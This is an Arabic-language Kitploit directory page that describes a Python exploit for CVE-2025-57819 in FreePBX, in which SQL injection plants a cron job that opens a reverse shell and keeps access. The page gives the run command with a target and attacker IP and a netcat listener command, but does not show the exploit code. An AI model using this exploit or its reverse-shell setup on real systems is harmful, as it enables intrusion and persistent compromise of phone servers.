Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-57819-exploit — استغلال بلغة Python لـ CVE-2025-57819 يستهدف FreePBX عبر حقن SQL غير مصادق عليه لتحقيق تنفيذ التعليمات البرمجية عن بُعد مع شل عكسي تلقائي واستمرارية عبر cron. | Kitploit
أدوات/GitHubGitHub/its1zero/cve-2025-57819-exploit
آليات الاستمراريةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubits1zero/cve-2025-57819-exploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

cve-2025-57819-exploit

استغلال بلغة Python لـ CVE-2025-57819 يستهدف FreePBX عبر حقن SQL غير مصادق عليه لتحقيق تنفيذ التعليمات البرمجية عن بُعد مع شل عكسي تلقائي واستمرارية عبر cron.

عرض المستودع
5منذ 2 أشهرلم تتم المراجعة بعد
مشاركة

استغلال CVE-2025-57819

البيانات الوصفية

  • الخطورة: حرجة (9.8)
  • المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • النوع: حقن SQL بدون مصادقة → تنفيذ كود عن بُعد
  • البرمجيات المتأثرة: FreePBX (وحدة نقطة النهاية) < 15.0.66, < 16.0.89 و < 17.0.3
  • اختُبر على: FreePBX 16.0.40.7 على CentOS 7 مع Apache 2.4

نظرة عامة

يستغل هذا البرنامج النصي CVE-2025-57819 في وحدة نقطة نهاية ضعيفة في FreePBX. تسمح الثغرة بحقن SQL، والتي يتم استغلالها لحقن مهام cron خبيثة.

لا توجد أي خطوات إضافية ضرورية كما في الاستغلالات العامة الأخرى التي تتطلب التفاعل مع صدفة ويب مرفوعة على الهدف. إنه نهج مباشر يمنحك وصولًا مباشرًا إلى صدفة عكسية.

التأثير

يتم تحقيق تنفيذ الكود عن بُعد من خلال حقن SQL والتلاعب بمهام cron. يؤدي الاستغلال الناجح إلى صدفة عكسية على النظام المستهدف. اعتمادًا على الإعدادات، قد يؤدي هذا إلى اختراق كامل للنظام.

الميزات

  • حقن SQL عبر نقطة نهاية AJAX ضعيفة
  • توليد تلقائي لحمولة الصدفة العكسية
  • استمرارية مهام cron عبر الجدولة للتنفيذ كل دقيقة (* * * * *)
  • تنظيف تلقائي لمهمة cron المحقونة
  • يستخدم حمولات مشفرة بالنظام الست عشري، لأن حمولات base64 تتلف عندما يتم تفسير أحرف + على أنها مسافات.

الاستخدام

شغّل الاستغلال بتوفير الهدف وإعدادات المستمع:

root@kitploit:~
python3 cve-2025-57819.py <target> <lhost> <lport>

المعاملات

  • <target>: اسم المضيف أو عنوان IP الخاص بالهدف (مثيل FreePBX ضعيف)
  • <lhost>: عنوان IP الخاص بالمهاجم لاستقبال اتصال الصدفة العكسية
  • <lport>: منفذ الاستماع للاتصال الوارد

مثال:

root@kitploit:~
python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999

إعداد المستمع

ابدأ مستمعًا قبل تنفيذ الاستغلال:

root@kitploit:~
nc -lvnp <port>

مثال:

root@kitploit:~
nc -nlvp 9999

إخلاء المسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبار الأمان المصرح به فقط. الاستخدام غير المصرح به ضد الأنظمة دون إذن صريح غير قانوني. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام أو الأضرار الناجمة عن هذه الأداة.

المؤلف

Its1Zero - [email protected]

المراجع

  • https://nvd.nist.gov/vuln/detail/cve-2025-57819
  • https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h
  • https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819
تنزيل الأداة